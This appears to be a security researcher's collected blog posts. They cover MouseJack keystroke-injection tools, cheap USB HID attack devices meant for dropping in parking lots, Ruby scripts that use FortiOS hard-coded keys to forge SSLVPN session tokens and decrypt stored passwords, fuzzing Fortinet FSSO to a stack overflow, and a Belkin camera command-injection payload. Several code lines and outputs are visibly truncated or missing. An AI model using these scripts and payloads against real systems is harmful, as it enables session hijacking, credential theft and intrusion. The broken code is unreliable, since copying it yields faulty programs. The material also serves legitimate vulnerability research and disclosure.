Summer Projects

Last summer a friend and I worked on some electronics projects so I thought I’d write a post about it.


Marc Newlin and the team over at Bastille released a vulnerability called MouseJack in early 2016. This vulnerability allows an attacker to send keystrokes directly to a wireless mouse or keyboard, similar to a Hak5 Rubber Ducky, but from up to hundreds of meters away.

I found out about the vulnerability around June last year and immediately set about replicating the research. Shortly after, we published a tool called JackIt.

JackIt is a relatively simple Python script that leverages a CrazyRadio PA USB adapter to inject keystrokes into many Microsoft and Logitech keyboards and mice using the NRF24L01+ protocol. It uses the same HID attack description syntax as the Hak5 Rubber Ducky, called Duckyscript, and you can find example payloads in the project wiki.
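For the unfamiliar, a Duckyscript payload is just a list of keystroke commands. A minimal Windows example (this particular payload is mine for illustration, not one from the wiki) might look like:

```
DELAY 1000
GUI r
DELAY 200
STRING calc.exe
ENTER
```

This waits a second for the target to catch up, opens the Run dialog with Win+R, types calc.exe and presses Enter.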

Microcontroller MouseJack

After my friend and I wrote the JackIt tool, we realized that carrying around a laptop with a specialized USB radio was a bit sketchy. It would be much more effective to carry around a simple physical key fob that would opportunistically exploit the vulnerability.

In August, after a bit of Arduino tinkering and learning to solder, we found a platform that worked nicely and created a portable version called uC_Mousejack. Depending on the battery size and radio, it can run for up to a day per charge and still manages 25 meters of range.

The microcontroller version uses PlatformIO as the toolchain (which is brilliant), and includes a Python script to compile Duckyscripts into C arrays for easy firmware recompilation.


During the uC_Mousejack project, I discovered that working with simple electronics is a breeze. I’m really surprised that there aren’t more custom hardware-based attacks in common use by penetration testers, especially considering that binary exploitation is a lot more challenging today.

My friend and I once again teamed up for the uDuck project and decided to make a simple PCB. The obvious choice was the USB HID attack popularized by the Hak5 Rubber Ducky. It’s a great attack, but unfortunately I can’t afford to drop a handful of $45 USB devices in a parking lot and hope for the best.

It’s worth mentioning that around the same time, Sensepost released the USaBUSe project. I really like the concept of a more feature-rich version, but it doesn’t fit our use case well. We wanted ultra-cheap devices that we can label as “Confidential” and leave in parking lots or around employee smoke-break areas. uDuck is the philosophically opposite approach; it embraces minimalism instead.

You can find the GitHub repo for uDuck here.

The uDuck can be reprogrammed over the same USB port that delivers the attack. To accomplish this, it leverages the Micronucleus bootloader. Essentially, it waits in the bootloader for 2 seconds after being connected, then changes into a keyboard device. The included Python script compiles a Duckyscript payload into a byte array, patches the firmware with the byte array (containing HID codes and delays) and waits for the USB device to be connected. Once connected, the new firmware is uploaded.
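The patching step itself is conceptually simple. A rough Ruby sketch (the marker bytes and layout are invented for illustration; the real script and firmware layout differ):

```ruby
# Sketch: patch a payload into a firmware image at a known placeholder.
# MARKER is a hypothetical sentinel compiled into the stock firmware.
MARKER = "DUCKPAYLOADHERE!"

def patch_firmware(firmware, payload)
  offset = firmware.index(MARKER)
  raise "marker not found" unless offset
  raise "payload too large" if payload.bytesize > MARKER.bytesize
  # NUL-pad the payload to keep the image size (and all offsets) unchanged
  padded = payload.ljust(MARKER.bytesize, "\x00")
  firmware[0, offset] + padded + firmware[(offset + MARKER.bytesize)..-1]
end

fw = "HEADER" + MARKER + "TRAILER"
patched = patch_firmware(fw, "\x2c\x00")
```

The patched image is then handed to the Micronucleus uploader during the 2-second bootloader window.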

No more fishing a microSD card out of a tiny slot and finding a card reader :).

So why is uDuck interesting? The devices can be made for less than $2 in relatively small quantities. It changes the economics of carrying out this attack.


I figured that MouseJack would be obsolete by now — it’s been over a year. Unfortunately it seems many of the vulnerable devices can still be bought in stores. It’s interesting that we find vulnerabilities in information security every day, but the old ones never seem to go away.

Anyway, if you’re in the infosec community don’t be afraid to jump into electronics. In the past, the toolchains for microcontrollers were arcane, the specialized equipment required was expensive and the learning curve was steep. The Arduino community and the momentum behind IoT made all of that a thing of the past.

I highly recommend buying some Feather boards from Adafruit and running through some of their tutorials. If you don’t want to learn C/C++, you can try out other boards like Puck.js (which uses JavaScript) or the Pycom boards (which use Python).

Bad Crypto

After figuring out how to unpack the binaries in FortiOS (covered in my last post), I noticed most of the functionality is provided by /bin/init, and all other daemons are just symlinks to that one file. So I followed my first instinct and loaded it into IDA.

The first thing one notices is all the xrefs to strcpy and sprintf. Yeah, thar be 0-days. But let’s not get into that just yet.

After a bit of hunting for OpenSSL function xrefs and interesting strings, I noticed there are many hard-coded encryption keys. This isn’t a great practice: it means some aspects of the system’s security are governed by “security through obscurity”. In other words, they’re hoping no one will check how it works under the hood.

Let’s start with SSLVPN. FortiGate has both web-based and thick client SSLVPN. From my Burp proxy logs, the authentication sequence goes something like this:

  1. The client browses to the FortiGate via HTTPS, and is redirected to /remote/login.
  2. The client issues a POST to /remote/logincheck and is redirected to stage 2 authentication, which appears to be a “host check”.  I’m guessing it has features to verify that AV is installed and that sort of thing.
  3. The host check URL is /remote/hostcheck_install.  It has a few parameters, some of which appear encrypted.

The interesting thing about the host check URL is that this is the URL that actually responds with the Set-Cookie header, issuing the user an authentication cookie. So if you can guess or brute force this URL, you get a valid session. Neat.

Let’s take a look at an example request:

GET /remote/hostcheck_install?auth_type=1&user=76706E75736572&&grpname=76706E&portal=66756C6C2D616363657373&&rip= HTTP/1.1

Okay, so the user, grpname and portal parameters are just hex encoded.  So user, for example, is “vpnuser” in ASCII. But what is the sid parameter?  Can we decode this?
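Decoding those parameters takes one line of Ruby:

```ruby
# user/grpname/portal are plain hex-encoded ASCII
def hex_decode(s)
  [s].pack('H*')
end

puts hex_decode("76706E75736572")  # "vpnuser"
```

The reverse direction is just as easy: `"vpnuser".unpack('H*').first`.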

As it turns out, I stumbled upon the code to decrypt the sid (and SVPNCOOKIE) by accident. I noticed the string “c25*dc2$dgl#jp^” in the string table of the /bin/init binary, and my curiosity was piqued. After some extensive reversing, here’s some Ruby code to decrypt sid values, and make new ones:

#!/usr/bin/env ruby
# encoding: binary

require 'openssl'

def get_cipher_key(s)
  sv_cookie_key1 = "\xdf\x19\x79\x86"
  sv_cookie_key2 = "\x38\xba\x40\xdf"
  sv_cookie_hkey =
    "\xcd\xf1\xfb\x45\xdc\x85\x37\xba" +
    "\x9d\xce\x58\x45\xc7\xb0\x9e\x62" +
    "\x46\x2a\x2a\xb0\xec\x15\x5b\x5b"
  # Key is two baked-in 4-byte constants plus 8 bytes of an HMAC;
  # the IV is the first 16 bytes of the same HMAC.
  hmac = OpenSSL::HMAC.digest('sha1', sv_cookie_hkey, s)
  ks = sv_cookie_key1 + sv_cookie_key2 + hmac[0,8]
  iv = hmac[0,16]
  [ks, iv]
end

def encode_sid(sid)
  secret = "c25*dc2$dgl#jp^"
  # Append an HMAC of the plaintext, then encrypt with Camellia-128-CBC
  sid += OpenSSL::HMAC.digest('sha1', secret, sid)
  cipher ='camellia-128-cbc').encrypt
  cipher.key, cipher.iv = get_cipher_key(secret)
  cookie = cipher.update(sid)
  cookie <<
  cookie.unpack('H*').first  # hex encode, as it appears in the URL
end

def decode_sid(sid)
  sid = sid.scan(/../).map { |x| x.hex.chr }.join  # hex decode
  secret = "c25*dc2$dgl#jp^"
  cipher ='camellia-128-cbc').decrypt
  cipher.key, cipher.iv = get_cipher_key(secret)
  cookie = cipher.update(sid)
  cookie <<
end

puts decode_sid(ARGV[0])

You might be wondering: what’s up with the get_cipher_key function? I think this is their crude attempt at obfuscation. The translation to Ruby is fairly literal, so I left it as is. But yes, they actually derive the key at runtime, just to make my life a little more interesting.

If you run the script with a valid sid parameter as an argument, you should get similar output to the following:


Neat. So it appears each value is encoded with a 4-digit length field, then the value. The values seem to be the serial number, username, user group, portal name, IP address, some zeros (probably the realm), a “1”, and the epoch timestamp (twice). Wait… all of this is simple to brute force!
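Splitting the decrypted blob back into fields takes only a few lines. This sketch assumes the length fields are 4 ASCII decimal digits, which is how I read the output above (treat that as my interpretation, not a documented format):

```ruby
# Split a decrypted sid into its length-prefixed fields.
# Assumes each field is a 4-digit ASCII decimal length, then the value.
def split_fields(plain)
  fields, i = [], 0
  while i + 4 <= plain.length
    len = plain[i, 4].to_i
    fields << plain[i + 4, len].to_s
    i += 4 + len
  end
  fields
end

p split_fields("0007vpnuser0003vpn")  # ["vpnuser", "vpn"]
```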

I’ll leave the implementation of a brute force script to the reader, but yeah, it works. There is very little entropy in the sid token. The serial number of a remote FortiGate is simple to obtain: many of the self-signed certificates on the system set the CN to the serial number, so in most cases it’s as easy as running: echo "" | openssl s_client -showcerts -connect <ip address>:443

If that doesn’t work, try spoofing a CAPWAP packet — but that’s a story for another day.

The unix epoch time can be iterated over the last hour or so, and the source address may be known if the target can be observed. NAT means that anyone logging in via an airport or coffee shop network has a known source IP. And if you already have credentials to the VPN and just want to log in as a different user (with more favorable permissions), it’s dead simple.

While that’s pretty cool, are there any other obvious examples of bad crypto? Another thing that caught my eye is encrypted passwords in the config. Passwords for admin users are stored as hashes, and while those are weak (Hashcat will crack the hashes that start with AK1), they’re at least not trivially reversible. But take a look at the passwords for other system users:

config user local
 edit "vpnuser"
  set type password
  set passwd-time 2015-09-02 11:45:00
  set passwd ENC XR/8Zk1ztvCtvMCrFT661civgZ3XxLZR0aWUuKCMGYVOk0KXpo41RnA5w/jkY76FzX3bTVWaehMTMypDO0s68a2SVApPvWAUXJKJZsUrU0RKyxa279fBcvVuM6TVYFvOa/INexHo99zbneHEr2O14tyxt5RGLPlVobWMgpJuJTFF1b5UDSbRc5hoS1/4ERHvi+Vazg==

It turns out these are reversible. You can tell because values such as IPSec PSKs (which need to be known in cleartext) are encoded this way. So after some more reversing, I figured out the encryption scheme:

#!/usr/bin/env ruby
# encoding: binary

require 'openssl'
require 'base64'

# The blob is a 4-byte IV fragment followed by the DES-CBC ciphertext,
# encrypted with a key baked into /bin/init.
iv, text   = Base64.decode64(ARGV[0]).unpack("a4a144")
cipher     ='des-cbc').decrypt
cipher.key = "\x34\x7c\x08\x94\xe3\x9b\x04\x6e"
cipher.iv  = iv + "\x00" * 4
cipher.padding = 0  # the blob is NUL-padded, not PKCS#7

pass = cipher.update(text) <<

# The cleartext is NUL-terminated
eos = pass.index("\x00")
pass = pass[0, eos] if eos && eos > 0

puts pass

If you run the code above with the base64 value from the config snippet above, it will decrypt to the value “password”.

The moral of the story is this: don’t use baked-in encryption keys. Use hashes (strong ones) when possible. If that isn’t possible, create keys from random numbers (with good entropy). If that’s not possible, derive keys from a configurable master pass phrase. But don’t ever bake it in and hope no one will reverse engineer your code.
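In Ruby, for instance, that last option is nearly a one-liner with PBKDF2 (the iteration count and sizes here are illustrative; tune them for your threat model):

```ruby
require 'openssl'

# Derive a 32-byte key from a configurable master passphrase and a
# random per-install salt -- instead of baking the key into the binary.
def derive_key(passphrase, salt)
  OpenSSL::PKCS5.pbkdf2_hmac(passphrase, salt, 100_000, 32, 'sha256')
end

salt = OpenSSL::Random.random_bytes(16)  # store alongside the ciphertext
key  = derive_key("master pass phrase", salt)
puts key.unpack('H*').first
```

The salt is not secret and can sit next to the ciphertext; the point is that an attacker with only the binary learns nothing.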

Fuzzing for Domain Admin

Last week Enrique Nissim of Core Security published an article called Analysis of a Remote Code Execution Vulnerability on Fortinet Single Sign On.  Lately I’ve been using Deja Vu Security’s excellent Peach Fuzzer to find vulnerabilities, and I wanted to see how easy this would be to reproduce.

First, I installed Wireshark, Windbg, Peach 3 and FSSO 4.3.143 onto a Windows 2008 R2 server VM.  While Windows 2008 R2 is 64-bit only, FSSO is always 32-bit, which should make writing the exploit simpler.  Next, I loaded up a FortiGate VM and configured FSSO according to the documentation.  All Fortinet products can be downloaded and trialed for 14 days, which makes vulnerability hunting a breeze, although you will have to set up an account first.

As indicated by Enrique’s article, FSSO communicates via TCP port 8000.  A Wireshark capture shows the structure of the hello packet:


The capture shows the packet format as follows:

  • A packet header, comprised of a 32-bit big endian size field covering the whole payload (including the size field itself), a tag value of 80, and a type value of 06.  These tag and type values correspond to a hello packet.
  • TLV-like structures, with the same size, tag, type and value structures.
  • TLVs for version, serial number and an MD5 authentication hash.
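Packing that structure up is straightforward. Here is a Ruby sketch (the one-byte widths for tag and type are my inference from the capture, not a documented format):

```ruby
# Build an FSSO-style TLV: 32-bit big-endian size (which covers the
# size field itself), one tag byte, one type byte, then the value.
def tlv(tag, type, value)
  [value.bytesize + 6, tag, type].pack('NCC') + value
end

# A hello-like packet: an outer TLV (tag 0x80, type 0x06) wrapping
# inner TLVs such as the version string.
hello = tlv(0x80, 0x06, tlv(0x01, 0x01, "4.3.143"))
puts hello.unpack('H*').first
```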

Peach uses XML to describe how to fuzz a target.  The portion of the XML that describes the packet format is the data model.  Other sections include a state model, which describes stateful protocols (we’re only fuzzing the hello packet); an agent, which describes how to instrument the target; and a test, which describes how to interface with the target.  The full Peach Pit can be found on GitHub.
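The data model for the hello packet header boils down to something like this (abbreviated and illustrative, not the actual Pit from the repo):

```xml
<DataModel name="HelloPacket">
  <!-- 32-bit big-endian size of the whole packet, including this field -->
  <Number name="Size" size="32" endian="big">
    <Relation type="size" of="HelloPacket" />
  </Number>
  <Number name="Tag"  size="8" value="128" /> <!-- 0x80 -->
  <Number name="Type" size="8" value="6" />   <!-- hello -->
  <Blob   name="Payload" />
</DataModel>
```

The size relation is what lets Peach keep the length field consistent (or deliberately inconsistent) while it mutates the payload.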

Running the Peach Pit is simple.  I’ve installed Peach into the directory c:\peach on the Windows 2008 R2 VM.  You can start fuzzing by copying the Pit to the peach directory and running “peach.exe fsso.xml”.

After only 41 fuzz runs, I obtained the following crash:

(13f8.e54): Access violation - code c0000005 (first chance)
eax=fffffffe ebx=00000658 ecx=75e898da edx=1c781104 esi=ffffffff edi=1c7e2ce8
eip=41414141 esp=1cbbfe1c ebp=00000000 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
41414141 ??              ???

Textbook stack buffer overflow.  To make the situation worse, two modules in the FSSO service do not use ASLR:


So we know we control EIP (0x41414141), and we have at least two modules that do not have ASLR enabled; one of them contains address values with no null bytes, which is perfect for building a ROP chain.

FSSO usually runs as domain administrator.  If we’re able to exploit this service we effectively have control over the entire network.  While Fortinet might not be a common household name like Cisco or Microsoft, Fortinet has sold over a million firewalls and FSSO is widely deployed.  It is also quite likely that there are other vulnerabilities in this service, such as the DCAgent protocol running on UDP port 8002 (which is also enabled by default).  Next week I’ll demonstrate how to build a working Metasploit module for this vulnerability, and we’ll try some fuzzing of the DCAgent protocol.

Universal Plug and Fuzz

Earlier this week I bought a Belkin Netcam HD web camera.  It’s probably the most insecure device I’ve ever tested, or even heard about. With the firmware that comes pre-loaded, the telnet service is wide open as root. There’s also an undocumented web interface. The default password is admin:admin, and it’s hard-coded.  This means that regardless of how the user sets the device up, an attacker can simply browse to /apcam/apcam/jsstream.asp and watch the video stream.

These issues were reported to Belkin and are fixed in the latest firmware. In the new firmware release, the web administration pages are gone and telnet is disabled. There may be some vulnerabilities left there, but I decided to look at another vector instead: Universal Plug and Play. Belkin WeMo devices are controlled by UPnP, and it appears that the Netcam supports the full WeMo UPnP API.  This makes the attack surface fairly large and manual fuzzing a bit cumbersome.

With that in mind, I’ve created a new UPnP enumeration and fuzzing framework, called UFuzz (Universal Plug and Fuzz). Since the readme in the GitHub repo is pretty short, this seems like a good time to see how UFuzz works.

In order to fuzz the Belkin Netcam, simply configure the device to connect to your wireless network and issue the following command to start UFuzz:

./ufuzz -u -v 4

The -u option starts UPnP mode, and the “-v 4” option changes the verbosity to TRACE. This allows us to see the requests and response summaries during fuzzing.

When UFuzz starts, it sends an SSDP M-SEARCH via UDP multicast to discover all of the devices on the subnet. It then downloads and parses the XML service description files. Next, template requests are created for each service accessible via UPnP. It’s a bit dumb right now, so it just uses “1” as the default value for each parameter (though you’re welcome to make it smarter).

Finally, it iterates through each parameter, trying different fuzz values to produce a fault. A fault in UFuzz can be an excessive time delay, as is the case for command injection and blind SQL injection payloads, or the target can be instrumented via telnet, serial or syslog to detect exploitable crashes.  Example modules are included for the telnet and serial monitors.

I should mention that UFuzz isn’t just a one-trick pony. It can also fuzz Burp proxy logs. This raises the obvious question: why not just use Burp to detect these issues? Burp is a fantastic web security scanner, but it doesn’t detect a lot of issues specific to embedded systems. For example, if I send a long string of A’s to a specific parameter, it could cause a buffer overflow in the HTTP server or in another binary that the HTTP server calls. The server might even answer with a “200 OK” in certain scenarios. By instrumenting the system, we can check logs or serial output for strings like “SIGSEGV” and log appropriately.

In the time it’s taken to write the above paragraphs, UFuzz has found another bug in the Belkin Netcam:

[2014-04-04T16:13:43-07:00 EVENT DETECTED] cmd injection - possible cmd injection - "`ping -c 10`": delay 9.18

Turns out that’s not a false positive. You can try it out yourself with this Metasploit module. I should also mention — it’s quite possible this affects all Belkin WeMo devices. If someone has a WeMo switch, please try it and let me know.

Until next time, happy bug hunting!